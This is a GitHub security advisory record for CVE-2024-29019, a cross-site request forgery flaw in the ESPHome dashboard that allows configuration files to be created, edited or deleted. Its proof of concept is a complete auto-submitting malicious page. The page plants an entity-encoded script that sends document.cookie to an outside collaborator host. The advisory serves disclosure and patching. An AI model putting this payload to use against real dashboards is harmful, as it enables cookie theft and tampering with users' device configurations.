{
  "schema_version": "1.4.0",
  "id": "GHSA-5925-88xh-6h99",
  "modified": "2024-04-11T14:40:50Z",
  "published": "2024-03-21T16:26:35Z",
  "aliases": [
    "CVE-2024-29019"
  ],
  "summary": "ESPHome vulnerable to Authentication bypass via Cross site request forgery",
  "details": "### Summary\nAPI endpoints in dashboard component of ESPHome version 2023.12.9 (command line installation) are vulnerable to Cross-Site Request Forgery (CSRF) allowing remote attackers to carry out attacks against a logged user of the dashboard to perform operations on configuration files (create, edit, delete).\n\n### Details\nIt is possible for a malicious actor to create a specifically crafted web page that triggers a cross site request against ESPHome, this allows bypassing the authentication for API calls on the platform.\n\n### PoC\nAn example of malicious web page that abuses this vulnerability:\n\n\n<html>\n  <body>\n\t<form action=\"http://localhost:6052/edit?configuration=poc.yaml\" id=\"#main\" method=\"POST\" enctype=\"text/plain\" onsubmit=\"setTimeout(function () { window.location.reload(); }, 10)\">\n  \t<input type=\"hidden\" name=\"&lt;script&gt;&#13;&#10;fetch&#40;&apos;https&#58;&#47;&#47;907zv9yp9u3rjerkiakydpvcr3xulk99&#46;oastify&#46;com&#63;x\" value=\"y&apos;&#44;&#32;&#123;&#13;&#10;method&#58;&#32;&apos;POST&apos;&#44;&#13;&#10;mode&#58;&#32;&apos;no&#45;cors&apos;&#44;&#13;&#10;body&#58;document&#46;cookie&#13;&#10;&#125;&#41;&#59;&#13;&#10;&lt;&#47;script&gt;&#13;&#10;\" />\n\t</form>\n\n\t<script>\n  \tdocument.forms[0].submit();\n\t</script>\n\n\t<script>\n\t</script>\n  </body>\n</html>